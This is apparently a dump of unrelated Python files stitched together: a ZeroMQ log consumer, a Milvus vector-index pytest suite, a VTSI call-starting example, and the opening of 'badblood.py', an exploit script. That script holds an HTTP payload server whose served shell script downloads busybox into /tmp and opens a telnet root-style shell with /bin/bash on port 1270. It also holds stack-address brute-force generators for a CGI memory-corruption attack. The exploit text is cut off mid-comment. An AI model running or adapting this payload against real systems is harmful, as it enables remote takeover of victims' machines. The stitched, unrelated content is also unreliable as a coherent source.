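def example_log_consumer(port=3330):
    context = zmq.Context()
    puller = context.socket(zmq.PULL)
    puller.bind("tcp://127.0.0.1:{}".format(port))
    try:
        while True:
            # raw=False mirrors the use_bin_type=True used by prepare() above
            payload = salt.utils.msgpack.loads(puller.recv(), raw=False)
            if payload is None:  # defensive guard, see note above
                break
            record = logging.makeLogRecord(payload)
            logging.getLogger(record.name).handle(record)
    finally:
        puller.close(0)
        context.term()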
test_index.py
import logging import time import pdb import copy import threading from multiprocessing import Pool, Process import numpy import pytest import sklearn.preprocessing from utils import * from constants import * uid = "test_index" BUILD_TIMEOUT = 300 field_name = default_float_vec_field_name binary_field_name = default_binary_vec_field_name query, query_vecs = gen_query_vectors(field_name, default_entities, default_top_k, 1) default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"} class TestIndexBase: @pytest.fixture( scope="function", params=gen_simple_index() ) def get_simple_index(self, request, connect): logging.getLogger().info(request.param) # if str(connect._cmd("mode")) == "CPU": # if request.param["index_type"] in index_cpu_not_support(): # pytest.skip("sq8h not support in CPU mode") return copy.deepcopy(request.param) @pytest.fixture( scope="function", params=[ 1, 10, 1111 ], ) def get_nq(self, request): yield request.param """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index on field not existed expected: error raised ''' tmp_field_name = gen_unique_str() ids = connect.insert(collection, default_entities) with pytest.raises(Exception) as e: connect.create_index(collection, tmp_field_name, get_simple_index) @pytest.mark.level(2) def test_create_index_on_field(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index on other field expected: error raised ''' tmp_field_name = "int64" ids = connect.insert(collection, default_entities) with pytest.raises(Exception) as e: connect.create_index(collection, tmp_field_name, get_simple_index) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_no_vectors(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) 
connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition_flush(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) connect.flush([collection]) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index def test_create_index_without_connect(self, dis_connect, collection): ''' target: test create index without connection method: create collection and add entities in it, check if added successfully expected: raise exception ''' with pytest.raises(Exception) as e: dis_connect.create_index(collection, field_name, get_simple_index) @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq): ''' target: test create index interface, search with more query vectors method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) connect.create_index(collection, field_name, get_simple_index) logging.getLogger().info(connect.describe_index(collection, "")) nq = get_nq index_type = get_simple_index["index_type"] search_param = get_search_param(index_type) query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, search_params=search_param) connect.load_collection(collection) res = connect.search(collection, query) assert len(res) == nq @pytest.mark.timeout(BUILD_TIMEOUT) @pytest.mark.level(2) def test_create_index_multithread(self, connect, collection, args): ''' target: test create index interface with multiprocess method: create collection and add entities in it, create index expected: return search success ''' connect.insert(collection, default_entities) def build(connect): connect.create_index(collection, field_name, default_index) if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index threads_num = 8 threads = [] for i in range(threads_num): m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"]) t = MyThread(target=build, args=(m,)) threads.append(t) t.start() time.sleep(0.2) for t in threads: t.join() @pytest.mark.tags(CaseLabel.tags_smoke) def test_create_index_collection_not_existed(self, connect): ''' target: test create index interface when collection name not existed method: create collection and add entities in it, create index , make sure the collection name not in index expected: create index failed ''' collection_name = gen_unique_str(uid) with pytest.raises(Exception) as e: connect.create_index(collection_name, field_name, default_index) @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_insert_flush(self, connect, collection, get_simple_index): 
''' target: test create index method: create collection and create index, add entities in it expected: create index ok, and count correct ''' connect.create_index(collection, field_name, get_simple_index) ids = connect.insert(collection, default_entities) connect.flush([collection]) stats = connect.get_collection_stats(collection) assert stats["row_count"] == default_nb if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_same_index_repeatedly(self, connect, collection, get_simple_index): ''' target: check if index can be created repeatedly, with the same create_index params method: create index after index have been built expected: return code success, and search ok ''' connect.create_index(collection, field_name, get_simple_index) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_different_index_repeatedly(self, connect, collection): ''' target: check if index can be created repeatedly, with the different create_index params method: create another index with different index_params after index have been built expected: return code 0, and describe index result equals with the second index params ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) indexs = [default_index, {"metric_type":"L2", "index_type": "FLAT", "params":{"nlist": 1024}}] for index in indexs: connect.create_index(collection, field_name, index) connect.release_collection(collection) connect.load_collection(collection) index = connect.describe_index(collection, "") # assert index == indexs[-1] assert not index # FLAT is the last index_type, drop all indexes in server @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_different_index_repeatedly_B(self, connect, collection): ''' target: check if index can be created repeatedly, with the different create_index params method: create another index with different index_params after index have been built expected: return code 0, and describe index result equals with the second index params ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}] for index in indexs: connect.create_index(collection, field_name, index) connect.release_collection(collection) connect.load_collection(collection) index = connect.describe_index(collection, "") create_target_index(indexs[-1], field_name) assert index == indexs[-1] # assert not index # FLAT is the last index_type, drop all indexes in server @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) 
assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) connect.flush([collection]) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq): ''' target: test create index interface, search with more query vectors method: create collection and add entities in it, create index expected: return search success ''' metric_type = "IP" ids = connect.insert(collection, default_entities) connect.flush([collection]) get_simple_index["metric_type"] = metric_type connect.create_index(collection, field_name, get_simple_index) connect.load_collection(collection) logging.getLogger().info(connect.describe_index(collection, "")) nq = get_nq index_type = get_simple_index["index_type"] search_param = get_search_param(index_type) query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, metric_type=metric_type, search_params=search_param) res = connect.search(collection, query) assert len(res) == nq @pytest.mark.timeout(BUILD_TIMEOUT) @pytest.mark.level(2) def test_create_index_multithread_ip(self, connect, collection, args): ''' target: test create index interface with multiprocess method: create collection and add entities in it, create index expected: return search success ''' connect.insert(collection, default_entities) def build(connect): default_index["metric_type"] = "IP" connect.create_index(collection, field_name, default_index) if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") 
create_target_index(default_index, field_name) assert index == default_index threads_num = 8 threads = [] for i in range(threads_num): m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"]) t = MyThread(target=build, args=(m,)) threads.append(t) t.start() time.sleep(0.2) for t in threads: t.join() def test_create_index_collection_not_existed_ip(self, connect, collection): ''' target: test create index interface when collection name not existed method: create collection and add entities in it, create index , make sure the collection name not in index expected: return code not equals to 0, create index failed ''' collection_name = gen_unique_str(uid) default_index["metric_type"] = "IP" with pytest.raises(Exception) as e: connect.create_index(collection_name, field_name, default_index) @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_no_vectors_insert_ip(self, connect, collection): ''' target: test create index interface when there is no vectors in collection, and does not affect the subsequent process method: create collection and add no vectors in it, and then create index, add entities in it expected: return code equals to 0 ''' default_index["metric_type"] = "IP" connect.create_index(collection, field_name, default_index) ids = connect.insert(collection, default_entities) connect.flush([collection]) stats = connect.get_collection_stats(collection) assert stats["row_count"] == default_nb if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_same_index_repeatedly_ip(self, connect, collection): ''' target: check if index can be created repeatedly, with the same create_index params method: create index after index have been built expected: return code success, and search ok ''' default_index["metric_type"] = "IP" connect.create_index(collection, field_name, default_index) connect.create_index(collection, field_name, default_index) if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_different_index_repeatedly_ip(self, connect, collection): ''' target: check if index can be created repeatedly, with the different create_index params method: create another index with different index_params after index have been built expected: return code 0, and describe index result equals with the second index params ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) connect.load_collection(collection) stats = connect.get_collection_stats(collection) assert stats["row_count"] == default_nb default_index["metric_type"] = "IP" indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}] for index in indexs: connect.create_index(collection, field_name, index) connect.release_collection(collection) connect.load_collection(collection) index = connect.describe_index(collection, "") # assert index == indexs[-1] assert not index """ ****************************************************************** The following cases are used to test `drop_index` function ****************************************************************** """ @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index(self, connect, collection, 
get_simple_index): ''' target: test drop index interface method: create collection and add entities in it, create index, call drop index expected: return code 0, and default index param ''' # ids = connect.insert(collection, entities) connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_repeatedly(self, connect, collection, get_simple_index): ''' target: test drop index repeatedly method: create index, call drop index, and drop again expected: return code 0 ''' connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_without_connect(self, dis_connect, collection): ''' target: test drop index without connection method: drop index, and check if drop successfully expected: raise exception ''' with pytest.raises(Exception) as e: dis_connect.drop_index(collection, field_name) @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index_collection_not_existed(self, connect): ''' target: test drop index interface when collection name not existed method: create collection and add entities in it, create index , make sure the collection name not in index, and then drop it expected: return code not equals to 0, drop index failed ''' collection_name = gen_unique_str(uid) with pytest.raises(Exception) as e: connect.drop_index(collection_name, field_name) @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index_collection_not_create(self, connect, collection): ''' target: test drop index interface when index not created method: create collection and add entities in it, create index expected: return code not equals to 0, drop index failed ''' # no create index connect.drop_index(collection, field_name) @pytest.mark.level(2) def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index): ''' target: test create / drop index repeatedly, use the same index params method: create index, drop index, four times expected: return code 0 ''' for i in range(4): connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) def test_drop_index_ip(self, connect, collection, get_simple_index): ''' target: test drop index interface method: create collection and add entities in it, create index, call drop index expected: return code 0, and default index param ''' # ids = connect.insert(collection, entities) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index): ''' target: test drop index repeatedly method: create index, call drop index, and drop again expected: return code 0 ''' get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_without_connect_ip(self, dis_connect, collection): ''' target: test drop index without connection method: drop index, and check if drop successfully expected: raise exception ''' with 
pytest.raises(Exception) as e: dis_connect.drop_index(collection, field_name) def test_drop_index_collection_not_create_ip(self, connect, collection): ''' target: test drop index interface when index not created method: create collection and add entities in it, create index expected: return code not equals to 0, drop index failed ''' # ids = connect.insert(collection, entities) # no create index connect.drop_index(collection, field_name) @pytest.mark.level(2) def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index): ''' target: test create / drop index repeatedly, use the same index params method: create index, drop index, four times expected: return code 0 ''' get_simple_index["metric_type"] = "IP" for i in range(4): connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) @pytest.mark.tags(CaseLabel.tags_smoke) def test_create_PQ_without_nbits(self, connect, collection): PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"} ids = connect.insert(collection, default_entities) connect.create_index(collection, field_name, PQ_index) index = connect.describe_index(collection, "") create_target_index(PQ_index, field_name) assert index == PQ_index class TestIndexBinary: @pytest.fixture( scope="function", params=gen_simple_index() ) def get_simple_index(self, request, connect): # if str(connect._cmd("mode")) == "CPU": # if request.param["index_type"] in index_cpu_not_support(): # pytest.skip("sq8h not support in CPU mode") return copy.deepcopy(request.param) @pytest.fixture( scope="function", params=gen_binary_index() ) def get_jaccard_index(self, request, connect): if request.param["index_type"] in binary_support(): request.param["metric_type"] = "JACCARD" return request.param else: pytest.skip("Skip index") @pytest.fixture( scope="function", params=gen_binary_index() ) def get_l2_index(self, request, connect): request.param["metric_type"] = "L2" return request.param @pytest.fixture( scope="function", params=[ 1, 10, 1111 ], ) def get_nq(self, request): yield request.param """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index(self, connect, binary_collection, get_jaccard_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(binary_collection, default_binary_entities) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) binary_index = connect.describe_index(binary_collection, "") create_target_index(get_jaccard_index, binary_field_name) assert binary_index == get_jaccard_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition(self, connect, binary_collection, get_jaccard_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(binary_collection, default_tag) ids = connect.insert(binary_collection, default_binary_entities, partition_tag=default_tag) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) binary_index = connect.describe_index(binary_collection, "") create_target_index(get_jaccard_index, binary_field_name) assert 
binary_index == get_jaccard_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq): ''' target: test create index interface, search with more query vectors method: create collection and add entities in it, create index expected: return search success ''' nq = get_nq ids = connect.insert(binary_collection, default_binary_entities) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) connect.load_collection(binary_collection) query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, nq, metric_type="JACCARD") search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD") logging.getLogger().info(search_param) res = connect.search(binary_collection, query, search_params=search_param) assert len(res) == nq @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index): ''' target: test create index interface with invalid metric type method: add entitys into binary connection, flash, create index with L2 metric type. expected: return create_index failure ''' # insert 6000 vectors ids = connect.insert(binary_collection, default_binary_entities) connect.flush([binary_collection]) with pytest.raises(Exception) as e: res = connect.create_index(binary_collection, binary_field_name, get_l2_index) """ ****************************************************************** The following cases are used to test `describe_index` function *************************************************************** """ @pytest.mark.skip("repeat with test_create_index binary") def _test_get_index_info(self, connect, binary_collection, get_jaccard_index): ''' target: test describe index interface method: create collection and add entities in it, create index, call describe index expected: return code 0, and index instructure ''' ids = connect.insert(binary_collection, default_binary_entities) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) stats = connect.get_collection_stats(binary_collection) assert stats["row_count"] == default_nb for partition in stats["partitions"]: segments = partition["segments"] if segments: for segment in segments: for file in segment["files"]: if "index_type" in file: assert file["index_type"] == get_jaccard_index["index_type"] @pytest.mark.skip("repeat with test_create_index_partition binary") def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index): ''' target: test describe index interface method: create collection, create partition and add entities in it, create index, call describe index expected: return code 0, and index instructure ''' connect.create_partition(binary_collection, default_tag) ids = connect.insert(binary_collection, default_binary_entities, partition_tag=default_tag) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) stats = connect.get_collection_stats(binary_collection) logging.getLogger().info(stats) assert stats["row_count"] == default_nb assert len(stats["partitions"]) == 2 for partition in stats["partitions"]: segments = partition["segments"] if segments: for segment in segments: for file in segment["files"]: if "index_type" in file: assert file["index_type"] == get_jaccard_index["index_type"] """ 
****************************************************************** The following cases are used to test `drop_index` function ****************************************************************** """ def test_drop_index(self, connect, binary_collection, get_jaccard_index): ''' target: test drop index interface method: create collection and add entities in it, create index, call drop index expected: return code 0, and default index param ''' connect.create_index(binary_collection, binary_field_name, get_jaccard_index) stats = connect.get_collection_stats(binary_collection) logging.getLogger().info(stats) connect.drop_index(binary_collection, binary_field_name) binary_index = connect.describe_index(binary_collection, "") assert not binary_index @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index): ''' target: test drop index interface method: create collection, create partition and add entities in it, create index on collection, call drop collection index expected: return code 0, and default index param ''' connect.create_partition(binary_collection, default_tag) ids = connect.insert(binary_collection, default_binary_entities, partition_tag=default_tag) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) connect.drop_index(binary_collection, binary_field_name) binary_index = connect.describe_index(binary_collection, "") assert not binary_index class TestIndexInvalid(object): """ Test create / describe / drop index interfaces with invalid collection names """ @pytest.fixture( scope="function", params=gen_invalid_strs() ) def get_collection_name(self, request): yield request.param @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.level(1) def test_create_index_with_invalid_collection_name(self, connect, get_collection_name): collection_name = get_collection_name with pytest.raises(Exception) as e: connect.create_index(collection_name, field_name, default_index) @pytest.mark.level(1) def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name): collection_name = get_collection_name with pytest.raises(Exception) as e: connect.drop_index(collection_name) @pytest.fixture( scope="function", params=gen_invalid_index() ) def get_index(self, request): yield request.param @pytest.mark.level(2) def test_create_index_with_invalid_index_params(self, connect, collection, get_index): logging.getLogger().info(get_index) with pytest.raises(Exception) as e: connect.create_index(collection, field_name, get_index) class TestIndexAsync: @pytest.fixture(scope="function", autouse=True) def skip_http_check(self, args): if args["handler"] == "HTTP": pytest.skip("skip in http mode") """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.fixture( scope="function", params=gen_simple_index() ) def get_simple_index(self, request, connect): # if str(connect._cmd("mode")) == "CPU": # if request.param["index_type"] in index_cpu_not_support(): # pytest.skip("sq8h not support in CPU mode") return copy.deepcopy(request.param) def check_result(self, res): logging.getLogger().info("In callback check search result") logging.getLogger().info(res) """ ****************************************************************** The following cases are used to test `create_index` function 
****************************************************************** """ @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) logging.getLogger().info("start index") future = connect.create_index(collection, field_name, get_simple_index, _async=True) logging.getLogger().info("before result") res = future.result() # TODO: logging.getLogger().info(res) @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_drop(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) logging.getLogger().info("start index") future = connect.create_index(collection, field_name, get_simple_index, _async=True) logging.getLogger().info("DROP") connect.drop_collection(collection) @pytest.mark.level(2) def test_create_index_with_invalid_collection_name(self, connect): collection_name = " " with pytest.raises(Exception) as e: future = connect.create_index(collection_name, field_name, default_index, _async=True) res = future.result() @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_callback(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) logging.getLogger().info("start index") future = connect.create_index(collection, field_name, get_simple_index, _async=True, _callback=self.check_result) logging.getLogger().info("before result") res = future.result() # TODO: logging.getLogger().info(res)
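# --- Illustrative sketch (MyThread comes from utils and is not shown here) ---
# The multithreaded cases above rely on MyThread re-raising exceptions from
# the worker on join(); otherwise an assert inside build() could never fail
# the test.  A minimal implementation matching that assumption might look
# like this (the real helper in utils may differ):

class ExampleMyThread(threading.Thread):
    def run(self):
        self.exc = None
        try:
            super().run()
        except BaseException as e:  # remember assertion errors from the target
            self.exc = e

    def join(self, timeout=None):
        super().join(timeout)
        if self.exc is not None:
            raise self.exc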
make_multiple_calls.py
import uuid

from ondewo.vtsi.client import VtsiClient
from ondewo.vtsi.voip_pb2 import StartCallInstanceResponse, StartMultipleCallInstancesResponse

# SIP
SIP_SIM_VERSION: str = "latest"

# VTSI_SERVER
# For testing purposes 0.0.0.0 can be used
VTSI_HOST: str = "grpc-vtsi.ondewo.com"
VTSI_PORT: int = 443

# PROJECT
PROJECT_ID: str = "example_project_id"

#########################################

# Phone numbers to call
PHONE_NUMBERS = ["+11233232", "+2342345"]

# get_minimal_client() returns the minimal working VTSI client
client: VtsiClient = VtsiClient.get_minimal_client(voip_host=VTSI_HOST, voip_port=str(VTSI_PORT))


# deploy_caller() function for multi-threading
def deploy_caller(phone_number: str) -> StartCallInstanceResponse:
    response: StartCallInstanceResponse = client.start_caller(
        phone_number=phone_number,
        call_id=str(uuid.uuid4()),
        sip_sim_version=SIP_SIM_VERSION,
        project_id=PROJECT_ID,
    )
    return response


# Old method to start multiple calls, new method is more general
# Iterating through phone number list, start the parallel calls
# threads: List[Thread] = [
#     threading.Thread(target=deploy_caller, args=[phone_number])
#     for phone_number in PHONE_NUMBERS
# ]
# for thread in threads:
#     thread.start()

# Start multiple call instances via endpoint
response: StartMultipleCallInstancesResponse = client.start_multiple_call_instances(
    phone_numbers_by_call_ids={'1': PHONE_NUMBERS[0], '2': PHONE_NUMBERS[1]},
    call_ids=['1', '2'],
    sip_sim_version=SIP_SIM_VERSION,
    project_id=PROJECT_ID,
)
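# --- Illustrative sketch (not part of the original example) ------------------
# The hard-coded '1'/'2' call ids above only work for exactly two numbers.
# For an arbitrary PHONE_NUMBERS list the same request could be built from a
# generated mapping like this; the client call itself is unchanged and is
# left commented out, in the same style as the old method above.

call_map = {str(uuid.uuid4()): number for number in PHONE_NUMBERS}
# response = client.start_multiple_call_instances(
#     phone_numbers_by_call_ids=call_map,
#     call_ids=list(call_map.keys()),
#     sip_sim_version=SIP_SIM_VERSION,
#     project_id=PROJECT_ID,
# )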
badblood.py
from __future__ import division from http.server import HTTPServer, BaseHTTPRequestHandler from multiprocessing import Pool from functools import partial from itertools import repeat from threading import Thread import argparse import socket import time import ssl import sys import os def do_banner(): print("") print("▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄ ") print("▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌ ") print("▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌") print("▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ ") print("░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ ") print("░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ ") print("▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒ ") print(" ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ ") print(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") print(" ░ ░ ░ ░ ") print("") ## # The server that listens for the exploits HTTP callback. The script is hard coded below. Basically, # it will download busybox to the box, and create a telnet service on 1270 for the attacker to # telnet to. ## class PayloadServer(BaseHTTPRequestHandler): def do_GET(self): print('\n[*] Received an HTTP callback from %s at %s' % (self.address_string(), self.log_date_time_string())) self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() self.wfile.write(b"#!/bin/sh\ncurl --insecure https://www.busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-i686 -o /tmp/busybox\nchmod +x /tmp/busybox\n/tmp/busybox telnetd -p 1270 -l /bin/bash\n") ## # Loops through the possible top addresses and returns an array ## def generate_stack_top_addresses(): base = 0xbf800000 curr = base step = 0x1000 base_array = [] while curr != 0xbffff000: base_array.append(curr) curr += step return base_array ## # Our strategy is to try addresses in the middle of the range and work outwards. That means # that we are always trying to exploit the most likely to be exploited addresses first. ## def generate_all_addresses(top_addresses, low, high): # the array of addresses that we'll return all_array = [] # Start with the median value and work outward start_value = (high + low) // 2 # Ensure this is aligned if (start_value % 0x10) != 0: print('[-] Address generation failed: %lx' % (start_value % 0x10)) return all_array # step_values will be treated as a fifo step_values = [] step_values.append(start_value) # visited steps step_set = set() # produce all the addresses while step_values: curr_step = step_values.pop(0) # for each base address, produce the current step for base in top_addresses: address = base - curr_step # subtract! we are working off of top addresses all_array.append(address) step_set.add(curr_step) # increment / decrement the step high_step = curr_step + 0x10 if (high_step not in step_set and high_step < high): step_values.append(high_step) low_step = curr_step - 0x10 if (low_step not in step_set and low_step > low): step_values.append(low_step) return all_array ## # The payload ~as written~ guesses multiple addresses at once. Technically four last I looked. # This would need to be updated if that changed at all. This function just returns a list that # ensures all addresses are visited once. # # How does the payload guess four at once? Well. The way the payload is currently written, we # know we are dereferencing a stack address. We specifically dereference $ebp+8 (from # the context of the mod_cgi.so+0x003fe6). $ebp+8, when successful, dereferences to $ebp+12. # However! 
